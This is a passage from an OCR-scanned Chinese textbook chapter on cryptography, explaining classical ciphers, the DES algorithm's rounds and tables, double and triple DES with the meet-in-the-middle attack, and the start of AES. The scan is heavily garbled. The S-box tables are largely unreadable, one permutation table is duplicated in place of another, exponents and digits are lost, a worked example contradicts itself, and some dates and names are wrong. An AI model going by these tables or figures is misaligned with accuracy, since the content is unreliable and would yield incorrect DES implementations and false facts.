级 加 密 标 准 ) 等 算法 。 本 节 主 要 讲解 分 组 密码 。 

从 逻辑 上 看 ,分 组 密码 的 分 组 长 度 可 以 是 一 位 ,但 分 组 密码 和 序列 密码 之 间 的 真正 区 别 
在 于 序列 密码 是 按 其 在 数据 序列 中 的 位 置 加 密 每 个 位 ,而 分 组 密码 的 基本 模式 是 同等 对 待 
每 个 分 组 , 它 不 考虑 之 前 出 现 了 什么 。 由 于 序列 密码 每 次 只 能 对 一 个 数据 位 进行 加 解密 , 因 
此 更 适合 用 硬件 实现 ,而 不 适合 用 软件 实现 。 分 组 密码 可 以 避免 耗 时 的 位 操作 ,易于 处 理 计 
算 机 界定 大 小 的 数据 分 组 ,很 容易 用 软件 实现 。 

分 组 密码 的 安全 强度 取决 于 分 组 密码 算法 ,而 序列 密码 的 安全 强度 取决 于 伪 随 机 序列 
的 好 坏 。 当 前 绝 大 部 分 基于 网 络 的 常规 加 密 都 使 用 了 分 组 密码 ,分 组 密码 的 应 用 范围 也 比 
序列 密码 要 广泛 得 多 (序列 密码 主要 用 于 军事 .外 交 等 保密 信道 ) 。 
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3.2.1 古典 密码 学 


古典 加 密 方法 比较 简单 ,它们 大 多 采用 手工 或 机 械 操作 对 明文 进行 加 密 和 解密 。 在 科 
学 技术 高 度 发 达 的 今天 ,这 些 密码 绝 大 多 数 已 毫 无 安全 性 可 言 了 ,但 古典 密码 的 基本 设计 思 
想 仍 然 是 现代 密码 的 设计 基础 。 

1. 代替 密码 

代替 密码 又 称 为 替换 密码 ,就 是 按照 一 定 规则 将 明文 中 的 每 个 字符 替换 成 另 一 个 字符 ， 
明文 中 字符 的 位 置 保持 不 变 。 例 如 ,将 明文 按 T->>A、H->B、E->C 等 进行 蔡 换 。 典 型 的 
代替 密码 有 移 位 密码 、 单 表 置 换 密码 和 多 表 置 换 密 码 等 。 

(1) 移 位 密码 

移 位 密码 是 将 明文 字符 集 循环 向 前 或 向 后 移动 一 个 固定 位 置 。 例 如 将 英文 字符 集 向 后 
移动 三 个 位 置 , 即 对 英文 字母 表 ( 不 分 大 小 写 ) 做 置换 如 下 : 

abcdefghijklmnopqrstuvwxyz 

defghijklmnopqrstuvwxyzabece 

例如 , 设 有 明文 security, 经 过 上 述 置换 后 得 到 的 密 文 就 是 vhfxulwb。 

(2) 单 表 置 换 密码 

单 表 置 换 密码 就 是 把 明文 的 一 个 字符 用 相应 的 一 个 密 文 字符 代替 。 加 密 过 程 中 是 从 明 
文字 母 表 到 密 文字 母 表 的 一 对 一 映射 。 例 如 ,给 定 置 换 表 为 : 

abcdefghijklmnopqrstuvwxyz 

khwtxysgbpqejazmlnofcidvur 

例如 , 设 有 明文 security, 经 过 上 述 置 换 后 得 到 的 密 文 就 是 oxwcnbfu。 

(3) 多 表 置 换 密码 

用 多 表 置 换 密码 加 密 时 ,同一 个 字符 具有 不 同 的 密 文 ,从 而 改变 了 单 表 置换 中 密 文 的 唯 
一 性 。 这 种 替代 法 是 循环 地 使 用 有 限 个 字母 来 实现 替代 的 一 种 方法 。 

若 有 明文 信息 P,P,P，…P, ,采用 个 字母 Ki,K,Ks…K, 作为 密 钥 替代 ,那么 P; 将 根 
据 字母 K; 的 特征 来 替代 ,i 二 1,2,…,n。 密 钥 用 完 后 , P,+ 将 根据 字母 Ki 的 特征 来 替代 ， 
P+ 将 根据 字母 K, 的 特征 来 替代 ,如 此 循环 ,直到 加 密 完 为 止 。 

2. 换 位 密码 

换 位 密码 也 可 称 为 置换 密码 , 它 是 改变 明文 中 字母 的 位 置 , 明 文中 的 字母 不 变 。 也 就 是 
明文 中 的 字母 保持 不 变 , 但 顺序 被 打 乱 了 。 例 如 可 以 将 明文 the 变换 成 het。 

“天 书 " 密 码 是 现在 所 知 的 最 古老 的 换 位 密码 。 这 种 密码 早 在 公元 前 400 年 就 被 希腊 人 
用 来 加 密 信息 。 古 希腊 人 用 一 种 名 叫 “ 天 书 ” 的 器 械 来 加 密 信 息 ,这 种 器 械 是 由 一 条 绕 在 一 
个 圆 简 上 的 窗 长 纸 带 构成 的 。 先 将 纸 带 绕 在 “天 书 ” 器 械 圆 简 上 ,然后 沿 圆 简 水 平方 向 在 纸 
带 上 书写 明文 。 当 把 带子 从 圆 简 上 取 下 来 后 ,明文 字母 的 排列 顺序 就 被 打 乱 了 ,从 而 隐藏 了 
其 中 的 信息 。 接 收 方 只 要 将 该 纸 带 重新 绕 在 直径 与 原来 同样 大 小 的 圆 简 上 ,就 可 以 阅读 原 
来 的 信息 ,显然 圆 简 的 直径 就 是 密 钥 。 

下 面 将 要 介绍 的 DES 算法 就 大 量 使 用 了 换 位 密码 方法 ,我 国 古代 文学 中 的 藏 头 诗 、 回 
文 诗 等 实际 上 也 是 换 位 密码 方法 的 典型 实例 。 
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3.2.2 数据 加 密 标准 


数据 加 密 标 准 (Data Encryption Standard,DES) 算 法 是 20 世纪 70 年 代 由 美国 IBM 公 
司 的 W. Tuchman 和 C. Meyers 研制 出 来 的 ,并 于 1970 年 5 月 被 美国 国家 标准 局 公布 为 数 
据 加 密 标 准 的 一 种 分 组 加 密 算 法 。DES 的 出 现 是 密码 学 史上 的 一 大 进步 , 它 打破 了 以 往 对 
加 密 算法 研究 的 保密 限制 ,首次 形成 了 标准 化 的 密码 体系 ,推动 了 现代 密码 学 的 快速 发 展 。 

DES 算法 在 商业 ,金融 等 各 个 领域 有 过 非常 辉煌 的 广泛 应 用 ,但 由 于 攻击 密码 技术 的 
提高 ,破译 DES 算法 的 方法 不 断 出 现 , DES 算法 本 身 也 存在 一 些 致命 的 弱点 ,DES 算法 的 
安全 性 已 经 受到 了 严重 挑战 。 目 前 DES 算法 已 不 能 满足 重要 部 门 的 信息 安全 需要 ,但 是 
DES 算法 作为 世界 上 首 例 加密 标 准 , 吉 括 了 传统 密码 体制 的 精 散 ,以 后 出 现 的 很 多 对 称 加 
密 算 法 都 是 在 DES 算法 基础 上 发 展 起 来 的 。 

1. DES 算法 描述 

DES 是 分 组 加 密 算法 , 它 以 64 位 (二 进 制 ) 为 一 组 对 明文 数据 加 密 , 输 出 64 位 密 文 。 
密 钥 长 度 为 56 位 ,但 密 钥 通常 表示 为 64 位 ,并 分 为 8 组 ,每 | 
组 第 8 位 作为 奇偶 校 验 位 ,以 确保 密 钥 的 正确 性 ,这 样 对 用 户 


来 说 每 组 密 钥 仍 是 56 位 。 


DES 算法 如 图 3. 3 所 示 ,利用 密 钥 ,通过 传统 的 换 位 、 替 


输入 64 位 明文 数据 


换 和 异 或 等 变换 实现 二 进 制 明文 的 加 密 与 解密 。 | 在 明 近 制 下 16 和 渤 代 
pi 
(1) 对 输入 的 明文 从 右 向 左 按 顺序 每 64 位 分 为 一 组 (不 

足 64 位 时 在 高 位 补 0) ,并 按 组 进行 加 密 或 解密 。 


(2) 进行 初始 置换 。 

(3) 将 置换 后 的 明文 分 成 左 、 右 两 组 ,每 组 32 位 。 

(4) 进行 16 轮 相同 的 变换 ,包括 密 钥 变换 ,每 轮 变换 如 图 3.3 DES 算 法 图 
图 3.4 所 示 。 


| 输出 94 位 密 文 数据 


L132 位 R132 位 密 钥 56 位 
第 6 步 ] 第 4 步 | 1 
32 位 一 8 位 28 位 循环 左 移 | “| 28 位 循环 左 移 
扩展 置换 1 + 
56 位 一 48 位 
第 7 步 (十 第 5 秒 \、 压缩 置换 
| 
48 位 一 32 位 位子 密 
第 8 步 i Fe 48 位 子 密 钥 
1 
第 9 步 P 盒 置换 
第 11 步 第 10 步 
1 1 
万 32 位 及 32 位 密 钥 56 位 


图 3.4 一 轮 DES 
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(5) 将 变换 后 的 左右 两 部 分 合并 在 一 起 。 

(6) 道 初始 置换 ,输出 64 位 密 文 。 

2. DES 算法 加 密 过 程 

(1) 初始 置换 。 初 始 置换 就 是 对 输入 的 64 位 二 进 制 明文 p= 二 pi1ps…pes ,按照 表 3.1 的 
规则 改变 明文 p 的 顺序 。 表 中 的 数字 代表 明文 在 64 位 二 进 制 序列 中 的 位 置 。 

例如 ,根据 表 3.1, 将 原 明文 第 58 位 数 换 到 第 1 位 的 位 置 , 将 原 明 文 第 50 位 数 换 到 第 2 
位 的 位 置 ,将 原 明 文 第 7 位 数 换 到 第 64 位 的 位 置 等 。 


表 3.1 初始 置换 表 
58 50 42 34 26 18 10 2 
60 52 44 36 28 20 12 4 
62 54 46 38 30 22 14 6 
64 56 48 40 32 24 16 家 
57 49 41 33 25 17 9 1 
59 51 43 35 27 19 LY 3 
61 53 45 37 29 21 13 5 
63 55 47 39 31 23 15 7 


即 , 如 果 pp 三 pipa…pes ,那么 初始 置换 后 p= pss pso…pr。 

初始 置换 表 中 共有 8 行 8 列 , 共 64 个 元 素 , 其 元 素 的 排列 是 有 规律 的 ,可 以 把 上 面 4 行 
和 下 面 4 行 分 成 两 组 , 取 名 为 L 和 R。 

(2) 明文 分 组 。 将 置换 后 的 明文 , 即 新 的 64 位 二 进 制 序列 按 顺序 分 为 左 、 右 两 组 L,、 
R, ,每 组 都 是 32 位 。 

(3) 密 钥 置换 。 密 钥 置 换 就 是 按照 表 3. 2 的 规则 改变 密 钥 的 顺序 。 密 钥 置换 规则 和 前 
面 的 初始 置换 规则 完全 相同 。 例 如 根据 表 3. 2, 将 原 密 钥 第 57 位 数 换 到 第 1 位 的 位 置 ,将 
原 密 钥 第 49 位 数 换 到 第 2 位 的 位 置 , 将 原 密 钥 第 4 位 数 换 到 第 56 位 的 位 置 等 。 


表 3.2 密 钥 置换 
57 49 41 33 25 17 9 
1 58 50 42 34 26 18 
10 2 59 51 43 35 27 
19 11 3 60 52 44 36 
63 55 47 39 31 23 15 
7 62 54 46 38 30 22 
14 6 61 53 45 37 29 
21 13 5 28 20 12 4 


密 钥 置换 表 中 共有 8 行 7 列 ,56 个 元 素 ,其 元 素 的 排列 是 有 规律 的 ,可 以 把 上 面 4 行 和 
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下 面 4 行 分 成 两 组 , 取 名 为 Ki 和 Ke。 由 于 取消 了 原 64 位 密 钥 中 的 奇偶 校 验 位 ,在 表 3. 2 
中 就 不 会 出 现 8、16、24、32、40、48、56、64 这 些 数 值 了 。 
(4) 密 钥 分 组 、 移 位 与 合并 。 将 置换 后 的 56 位 密 钥 按 顺序 分 成 左右 两 个 部 分 K 和 
KR ,每 部 分 28 位 。 根 据 DES 算法 轮 数 (迭代 次 数 ) ,分 别 将 两 个 部 分 Ke 和 Ka 循环 左 移 1 
位 或 2 位 ,每 轮 循环 左 移 位 数 按照 表 3. 3 选取 。 
表 3.3 每 轮 密 钥 循环 左 移 位 数 
迭代 次 数 1 区 二 4 5 6 7 8 9 10 1 2 13. 14 15 16 
左 移 位 数 1 1 史 和 和 区 区 1 2 2 2 2 2 2 1 


例如 ,Ki 三 cics*…*cos ,Ke 二 did,…dzs， 由 于 是 第 1 次 迭代 ,循环 左 移 位 数 是 1, 因 此 
Kii=c2ca'"*casci, Kri=d2da3""*d2sd1o。 

天- KR 两 组 密 钥 循 环 左 移 后 再 合并 成 56 位 密 钥 。 例 如 天: 一 caca…czscldazcds…dzsdi 。 
合并 后 56 位 密 钥 一 方面 用 于 产生 子 密 钥 , 另 一 方面 为 下 次 迭代 运算 做 准备 ,如 图 3.4 所 示 。 

(5) 产生 子 密 钥 。 按 照 表 3.4, 从 56 位 密 钥 中 产生 48 位 子 密 钥 (Subkey) 。 


表 3.4 密 钥 压 缩 置 换 


57 49 41 33 25 17 9 
1 58 50 42 34 26 18 
10 2 59 51 43 35 27 
19 11 3 60 52 44 36 
63 55 47 39 31 23 15 
7 62 54 46 38 30 22 
14 6 61 53 45 37 29 
21 13 5 28 20 12 4 


密 钥 压 缩 置换 表 中 共有 48 位 元 素 。 例 如 , 原 密 钥 第 14 位 在 子 密 钥 中 就 是 第 1 位 , 原 密 
钥 第 17 位 在 子 密 钥 中 就 是 第 2 位 等 。 在 密 钥 压 缩 置换 表 中 看 不 到 9、18、22、25、35、38、43、 
54 这 8 个 元 素 ,因为 这 些 元 素 已 被 压缩 了 。 

(6) 扩展 置换 。 将 原 明 文 数据 的 右 半 部 分 R 从 32 位 扩展 成 48 位 ,扩展 置换 按照 表 3. 5 
所 示 规 则 进行 。 


表 3.5 扩展 置换 
32 1 2 3 4 5 
4 5 6 了 8 8 
8 9 10 11 12 13 
12 13 14 15 16 
16 17 18 19 20 21 
20 21 22 23 24 25 
24 25 26 27 28 29 
28 29 30 31 32 1 
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从 表 3.5 中 可 以 看 出 原 数据 第 32 位 被 扩展 成 第 1 位 和 第 47 位 , 原 数据 第 1 位 被 扩展 
成 第 2 位 和 第 48 位 。 在 扩展 置换 中 分 别 将 原 数 据 32 位 中 的 1、4、5、8、9、12、13、16、17、20、 


21、24、25、28、29、32 扩展 了 1 位 , 共 16 位 ,这 样 原 数据 的 32 位 就 扩展 成 48 位 了 。 


(7) 子 密 钥 和 扩展 置换 后 的 数据 异 或 运算 。 将 子 密 钥 和 扩展 置换 后 的 数据 按 位 进行 异 
48 位 输入 


或 运算 ,然后 将 得 到 的 48 位 结果 送 到 S 盒 代 替 (S-box) 。 

(8) S 盒 代替 。 将 48 位 数据 按 顺 序 每 6 位 分 为 一 
组 , 共 分 成 8 组 ,并 分 别 输入 到 Si 、S,、…、Ss 这 8 个 S 盒 
中 ,每 个 S 盒 的 输出 为 4 位 ,再 将 每 个 S 盒 的 输出 拼接 成 
32 位 。S 盒 如 图 3. 5 所 示 。 

DES 的 S 盒 代 替 如 表 3.6 所 示 。S 盒 的 使 用 方法 是 ， 
机 没 盒 的 输入 为 6 位 二 进 制 数 bib,bsbabs bs ,把 bibs 这 两 
位 二 进 制 数 转 换 成 十 进 制 数 ,并 作为 S 盒 的 行 号 i, 把 
bsbsbabs 这 4 位 二 进 制 数 转换 成 十 进 制 数 ,并 作为 S 盒 的 


6 位 


4 位 


| 


Ss 


32 位 输出 
图 3.5 S 盒 的 输入 输出 


列 号 j, 则 对 应 S 盒 的 (z,7) 元 素 就 为 S 盒 的 十 进 制 输出 ,再 将 该 十 进 制 数 转换 为 二 进 制 数 ， 


就 得 到 S 盒 的 4 位 二 进 制 输出 。 
表 3.6 DES 的 S 盒 代替 表 


代替 函数 | ， 列 号 
行 号 
5: 0 it 3 4 号 6 人 8 9 10 1 开 1.22:1. 难 ‖ 直 | 标 
0 14 4 19 1 过 15: | 3 8 3 10 | 6 2 | 和 世 9 0 7 
1 0 #5 | 汉 4 14 2 13 L 10 | 6 12 | 11 9 各 8 
2 4 1 14 8 13 | 6 3 11 | 15 | 12 9 7 3 10 | 5 0 
3 对 | 32 1.$ 2 4 9 1 7 5 11 3 14|110|0 6 13 
0 15 . 8 14 6 入 3 4 9 . 2 Fk 下 :| .起 § 10 
1 训 13 | 4 党 26 | 过 8 1 | 了 | 0 1 10 | 6 9 1 5 
» 用 0 14 4 ll1 |10| 4 13 1 5 8 i 6 9 3 2 15 
可 13 | 8 10 5 | #4 2 11 6 ? 12 | 0 5 4 9 
0 10 | 0 9 14 6 3 25 | 海 1 13 | 12 8 11 4 要 8 
1 al 2 0 9 3 4 6 9 中 多 8 5 鹉 ,| | 让 5 1 
2 2 13| 在 4 9 8 6. 3 0 11 1 a 松 | 态 10 4 7 
3 1 10 | 13 | 0 6 9 8 7 4 15 | 14 3 地 5 要 起 
0 13 | 14 3 0 6 9 10 1 人 8 5 于 二 | 证 人 | 类 15 
1 3 § 6 3S. | 息 a 4 人 和 i 入 10 4 9 
本 多 10 | 6 9 0 12 | 11 ” 3 | 且 1 3 14 | 5 2 8 4 
多 » 125 | 从 6 10 1 13 | 8 9 4 5 让 | 起 7 党 14 
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续 表 
代替 函数 行 呈 列 号 
S | 站 
ol2112I14|1|7li0ln1|lels|ls|ls|i1s5|l13|lo0o|l1u4|9 
1 ulnl2l12l4l7|l13|1|5|loli1s|l10|l|3|9|s|s 
2 lalelillliollrlslils |lis|ls|le|lsloli 
3 julsli2l7i1iluwl2zli13lelislolslil4ls|s 
0 各 
i lo || igs|elilwliuw|lo|lwlsl 
pa 
3 |jJ4l3l2l12l9|lslisliolnlul1ilrlielolslys 
olalnl2|lulslolsl3|l3|12|9|l7|sl1ivl6el1 
1 |1lolail7l4|l911lilalsl5ll2l2115ls816 
区 
医治 枚 医 二 医 :二 医 汉 区 到 本 攻 到 医 司 医 动 医 二 医 攻 二 攻 浊 攻 :二 医 2 
ola8 | | | | | os 7 
| i ss) 8 | ws | | || 
人 2 |7|1|4|1l912la4l2|o|l6llll5l si15|s 
3 |2|1|1847|14llsgllli5llizl 9lolsl5l610a 


例如 ,Si 盒 的 输入 为 101101, 则 记名 =(11): 王 3 行 ,03065 王 (0110)。 王 6 列 。 对 应 5 
盒 的 (3,6) 元 素 为 1, 将 1 转换 为 二 进 制 数 0001。 所 以 , 当 Si 盒 的 输入 为 101011 时 ,Si 盒 的 
输出 为 0001 。 

S 盒 代 替 是 DES 算法 的 核心 部 分 ,整个 变换 过 程 是 非 线 性 的 (而 DES 算法 的 其 他 变换 
都 是 线性 的 ) ,提供 了 很 好 的 混乱 数据 效果 , 比 DES 算法 其 他 步骤 提供 的 安全 性 要 好 。 

(9) 已 盒 置换 。 将 S 盒 输出 的 32 位 二 进 制 数据 按 表 3. 7 进行 置换 。 例 如 将 S 盒 输出 
的 第 16 位 变换 成 第 1 位 ,S 盒 输出 的 第 1 位 变换 成 第 9 位。 


表 3.7 也 盒 置 换 
16 7 20 21 29 用 站 17 
1 15 23 26 5 18 31 10 
2 8 24 14 32 3 9 
19 13 30 6 22 11 4 25 


(10) P 盒 输出 与 原 64 位 数据 进行 异 或 运算 。 将 忆 盒 输出 的 32 位 二 进 制 数 与 原 64 位 
数据 分 组 的 左 半 部 分 L; 进行 异 或 运算 ,得 到 分 组 的 右 半 部 分 R;, 如 图 3.4 所 示 。 
(11) Ri-: 一 >Li。 将 原 分 组 的 右 半 部 分 Ri-: 作 为 分 组 的 左 半 部 分 Li ,如 图 3.4 所 示 。 
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(12) 重复 (4)~~(11) 步 ,循环 操作 16 轮 。 
(13) 道 初始 置换 。 经 过 16 轮 的 DES 运算 后 ,将 输出 的 Lie 、Ris 合 并 起 来 ,形成 64 位 二 
进 制 数 。 最 后 按照 表 3. 8 进行 逆 初 始 置 换 , 就 可 以 得 到 密 文 了 。 


表 3.8 逆 初 始 置换 
40 8 48 16 56 24 64 32 
39 芝 47 15 55 23 63 31 
38 6 46 14 54 22 62 30 
37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 
35 3 43 11 51 19 59 27 
34 2 42 10 50 18 58 26 
33 1 41 9 49 i 57 25 


3. DES 算法 解密 过 程 
DES 算法 加 密 和 解密 过 程 使 用 相同 的 算法 ,并 使 用 相同 的 加 密 密 钥 和 解密 密 钥 , 两 者 


的 区 别 是 : 
(1) DES 加 密 时 是 从 Lo 、R。 到 Lis .Ri 进行 变换 的 ,而 解密 时 是 从 Lis 、Ris 到 Lo 、R。 进 
行 变 换 的 。 
(2) 加 密 时 各 轮 的 加 密 密 钥 为 KuKi…Kis ,而 解密 时 各 轮 的 解密 密 钥 为 Kis Ku…Ko。 
(3) 加 密 时 密 钥 循环 左 移 , 而 解密 时 密 钥 循环 右 移 。 


4. DES 问题 讨论 

当 DES 算法 被 建议 作为 一 个 标准 时 ,S 盒 作为 DES 的 安全 核心 ,成 为 比较 有 争议 的 问 
题 之 一 。 因 为 在 DES 算法 中 ,除了 S 盒 外 所 有 计算 都 是 线性 的 。 然 而 S 盒 的 设计 并 没有 
完全 得 到 规范 ,有 人 认为 可 能 存在 陷 门 。 

另外 ,S 盒 设 计 中 的 重复 值 使 加 密 、 解 密 变 换 的 密 钥 具有 多 值 性 ; 子 密 钥 长 度 为 48 位 ， 
但 只 有 32 位 输出 ,加密 强度 达 不 到 2 ,实际 只 有 2”X16= 二 2”;S 盒 是 精心 设计 的 (也 就 是 
结构 固定 的 ) , 它 可 能 有 利于 设计 者 破译 密码 。 

1976 年 ,美国 国家 安全 局 公布 了 下 列 几 条 S 盒 的 设计 原则 : 

(1) S 盒 的 每 一 行 是 整数 0,1,…',15 的 一 个 置换 ; 

(2) 没有 一 个 S 盒 是 它 输入 的 线性 或 仿 射 函 数 ; 

(3) 改变 S 盒 的 一 个 输入 位 至 少 要 引起 两 位 的 输出 改变 ; 

(4) 对 任何 一 个 S 盒 S;(1<i<8) 和 任何 一 个 输入 z(6 位 串 ) ,SCz) 与 Si(z 中 001100) 
至 少 要 有 两 位 不 同 ; 

(5) 对 任何 一 个 S 盒 S;(1 入 i 委 8) 和 任何 一 个 位 对 (e, 六 ,Si(z) 天 Si(z 由 llefo0); 

(6) 对 任何 一 个 S 盒 S;(1<i<8) ,如 果 固 定 一 个 输入 位 ,考察 一 个 特点 输出 位 的 值 ,该 
输出 位 值 为 0 的 输入 个 数 与 输出 位 值 为 1 的 输入 个 数 接近 。 

DES 算法 的 问题 就 是 56 位 的 密 钥 长 度 不 足以 抵御 穷 举 攻击 ,因为 密 钥 量 只 有 2 六 
107 个 。 事 实证 明 ,每 秒 测试 10* 个 密 钥 的 VLSI 芯片 机 器 大 约 需要 一 天 就 可 以 搜索 完整 个 
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DES 密 钥 空间 ;1997 年 3 月 ,美国 程序 员 Verser 用 了 96 天 时 间 成 功 找 到 了 DES 的 密 钥 ; 
1998 年 7 月 ,电子 前 沿 基金 会 (EFF) 56 小 时 内 破译 了 56 位 密 钥 的 DES,1999 年 1 月 只 用 
了 22 小 时 15 分 钟 。 

DES 算法 作为 分 组 密码 典型 代表 ,其 从 设计 到 安全 实现 都 代表 了 一 个 时 期 的 密码 水 
平 ,但 是 它 的 算法 安全 性 并 不 只 是 依赖 于 密 钥 ,其 加 密 函 数 中 的 S 盒 并 未 公开 ,因此 还 不 能 
完全 符合 现代 密码 学 的 算法 标准 。 

5. DES 的 变形 

由 于 DES 容易 受到 穷 举 式 攻 击 , 人 们 尝试 用 DES 和 多 个 密 钥 进行 多 次 加 密 ,其 中 双 
重 、 三 重 DES 已 被 广泛 采用 。 

(1) 双重 DES 

最 简单 的 多 次 加 密 形 式 是 用 两 个 密 钥 进行 两 次 加 密 。 已 给 一 个 明文 P 和 两 个 加 密 密 
钥 Ki 和 K,, 密 文 为 C: 

加 密 :C=Ew (En (P)), 解密 P=Da(Dxs(C)) 

解密 时 要 求 以 相反 的 次 序 使 用 密 钥 。 对 DES 来 说 ,这 个 算法 的 密 钥 长 度 是 两 个 密 钥 长 
度 的 和 , 即 112 位 ,因此 密码 强度 似乎 增加 了 一 倍 , 但 需要 严格 的 数学 证 明 。 

假设 对 于 DES 和 所 有 56 位 密 钥 ,任意 给 定 两 个 密 钥 K,， 和 K。 ,都 能 找到 一 个 密 钥 K: ， 
使 得 Es (En (P)) 二 Eis(P)。 如 果 假 设 成 立 , 则 DES 的 两 重 加 密 或 者 多 重 加 密 都 将 等 价 于 
用 一 个 56 位 密 钥 的 一 次 加 密 。 

上 面 的 假设 不 可 能 为 真 。 因 为 DES 加 密 事实 上 就 是 从 一 个 64 位 分 组 到 另 一 个 64 位 
分 组 的 置换 ,而 64 位 分 组 共有 2* 种 可 能 的 状态 ,因而 可 能 的 置换 个 数 为 2*1。 另 一 方面 ， 
DES 的 每 个 密 钥 确定 了 一 个 置换 ,因而 总 的 置换 个 数 为 2 一 107 。 虽 然 有 许多 证 据 支持 上 
面 的 假设 不 成 立 , 但 直到 1992 年 才 有 人 证 明了 这 个 结果 。 

既然 DES 算法 用 不 同 的 密 钥 进行 两 次 加 密 并 不 等 价 于 两 个 密 钥 的 一 次 DES 加 密 , 穷 
举 攻 击 被 限制 。 但 中 途 攻 击 算法 不 依赖 于 任何 DES 的 特殊 属性 , 它 对 任何 分 组 密码 都 有 
效 ,可 以 攻击 双重 DES 加 密 。 

中 途 攻 击 算法 基于 以 下 观察 ,如 果 有 C 二 Ei (Eri(P)), 则 X=En(P) 二 Dis(C)。 给 定 
一 个 已 知 明 、 密 文 对 (P,C) ,攻击 方法 如 下 : 首先 用 所 有 25 个 可 能 的 密 钥 加 密 已 ,得 到 2 个 
可 能 的 值 ,把 这 些 值 从 小 到 大 存在 一 个 表 中 ;然后 再 用 所 有 2 个 可 能 的 密 钥 对 C 进行 解密 ， 
每 次 做 完 解密 都 将 所 得 的 值 与 表 中 值 进行 比较 ,如 果 发 现 与 表 中 的 一 个 值 相等 , 则 它们 对 应 
的 密 钥 可 能 分 别 是 K, 和 K。。 现 在 用 一 个 新 的 明 、 密 文 对 检测 所 得 到 的 两 个 密 钥 ,如 果 满 
足 En,(P) 二 Di (0), 则 把 它们 接收 为 正确 的 密 钥 。 

对 于 任意 一 个 给 定 的 明文 p, 双 重 DES 产生 的 密 文 值 有 2 种 可 能 。 双 重 DES 实际 使 
用 了 一 个 112 位 的 密 钥 ,因此 有 2 下 种 可 能 的 密 钥 。 这 样 平均 来 说 对 于 一 个 给 定 的 明文 p， 
将 产生 一 个 给 定 密 文 C 的 不 同 的 112 位 的 密 钥 个 数 是 222/2% 一 28 ,因而 上 述 过 程 对 于 第 
一 对 明 、 密 文 有 2s 次 加 、 解 密 结果 相等 。 如 果 再 加 上 一 对 已 知 明 、 密 文 , 误 报 率 为 23/2% 二 
2-*。 因 此 ,已 知 两 对 明 、 密 文 ,实施 中 途 攻 击 检测 到 正确 密 钥 的 概率 为 1 一 2-*。 攻 击 的 工 
作 量 为 2”, 这 与 攻击 DES 的 工作 量 25 差 不 多 。 

(2) 三 重 DES 算法 

三 重 DES 算法 (3DES) 是 为 了 改进 DES 算法 的 安全 性 而 设计 的 。 它 的 基本 方法 是 使 
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用 两 个 不 同 的 56 位 密 钥 进行 三 次 DES 运算 , 即 进 行 加 密 -解密 -加 密 (EDE) 的 方案 。 
加 密 :C = En (Ds (En(P)))， 解密 : 已 = Da (Ew (Da(C)))。 

对 付 中 途 攻击 的 有 效 方法 是 用 三 个 密 钥 进行 三 次 加 密 。 这 将 把 已 知 明文 攻击 的 工作 量 
提高 到 222 ,这 个 密 钥 长 度 大 大 提高 了 抗 攻击 强度 。 其 缺点 是 要 使 用 3X56 王 168 位 的 
密 钥 。 

3DES 算法 与 DES 算法 具有 兼容 性 ,如 果 通 信 的 一 方 使 用 DES 算法 ,而 另 一 方 使 用 的 
是 3DES 算法 ,这 时 另 一 方 只 要 取 K, 二 Ks 就 可 以 了 ,其 效果 相当 于 进行 一 次 DES 运算 。 

第 二 个 步骤 使 用 解密 并 没有 密码 编码 上 的 考虑 ,相对 于 使 用 加 密 , 它 的 唯一 优点 是 可 以 
使 3DES 的 用 户 能 够 解密 原来 仅 用 一 重 DES 加 密 的 数据 , 即 P= Da (En (Dn(C)))= 
D(C 

使 用 两 个 密 钥 的 3DES 是 比较 受 欢迎 的 一 个 算法 ,已 被 密 钥 管理 标准 ANS X9. 17 和 
ISO 8732 采用 。 目 前 还 没有 针对 两 个 密 钥 3DES 的 实用 攻击 方法 ,但 有 一 些 设想 。 

具有 三 个 密 钥 的 3DES 的 加 、 解 密 过 程 如 下 : 

加 密 ;C = Es (Da(En(P)))， 解密 : 已 = Da(Ey (Dis(C)))。 

与 一 重 DES 的 兼容 性 可 以 通过 取 Ki 二 Ks 或 K: 一 K。 得 到 。 

3DES 避 开 了 DES 密码 的 安全 弱点 ,并 充分 利用 DES 已 有 的 软件 与 硬件 资源 ,对 DES 
算法 进行 简单 的 变换 ,形成 了 3DES 密码 算法 。3DES 密码 是 使 用 三 个 或 两 个 不 同 的 密 钥 
对 数据 块 进行 三 次 或 两 次 加 密 。 三 重 DES 的 安全 强度 大 约 相当 于 112 位 密 钥 长 度 的 DES 
算法 。 

3DES 算法 的 优点 在 于 : 

(1) 可 以 采用 三 个 密 钥 或 两 个 密 钥 。 对 于 三 密 钥 的 3DES, 总 密 钥 长 度 长 达 168 位 ,能 

(2) 提高 了 抗 中 途 攻击 能 力 。 

(3) 使 用 方便 。 由 于 3DES 的 底层 加 密 算法 与 DES 相同 ,所 以 许多 现 有 的 DES 软 、 硬 
件 产品 都 能 容易 地 实现 3DES。 

3DES 也 存在 明显 的 缺点 ,就 是 用 软件 实现 该 算法 的 速度 比较 慢 。 

3.2.3 高 级 加 密 标 准 

随 着 计算 机 技术 的 迅猛 发 展 和 新 的 有 效 攻击 算法 的 不 断 提出 ,加 上 DES 算法 存在 密 钥 
长 度 较 短 等 问题 ,使 破译 DES 算法 成 为 可 能 。 美 国联 邦 决定 自 1998 年 12 月 以 后 DES 将 
不 再 作为 联邦 加 密 标 准 , 新 的 加 密 标准 被 称 为 高 级 加 密 标准 (Advanced Encryption 
Standard,AES) 。1997 年 9 月 ,美国 国家 标准 技术 研究 所 (NIST) 公 布 了 征集 AES 候选 算 
法 的 通告 。2000 年 10 月 2 日 ,经 过 3 年 世界 著名 密码 专家 之 间 的 竞争 和 两 轮 公 开 评价 ， 
比利时 密码 专家 Joan Daemen 和 Vincent Rijmen 提出 的 Rijndael( 中 文 音译 为 “ 荣 代 尔 ”) 加 
解密 算法 被 美国 商务 部 最 终 推荐 为 高 级 加 密 标准 算法 。 

Rijndael 算法 是 一 种 分 组 密码 体制 ,其 明文 分 组 长 度 、 密 钥 长 度 可 以 是 128、192、256 位 
中 的 任意 一 个 。 按 照 密 钥 长 度 ,分 别 记 为 AES-128、AES-192 和 AES-256。 

相 比较 而 言 ,AES 比 DES 支持 更 长 的 密 钥 ,AES-128 密 钥 个 数 比 DES 的 56 位 密 钥 个 
数 要 多 102 倍 。 据 说 ,如 果 用 一 台 每 秒 钟 能 够 找 出 255 个 DES 密 钥 的 机 器 来 找 AES-128 的 
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密 钥 , 大 约 需 要 149 万 年 。DES 中 S 盒 的 选择 是 人 为 的 ,可 以 包含 后 门 , 而 AES 的 S 盒 具 
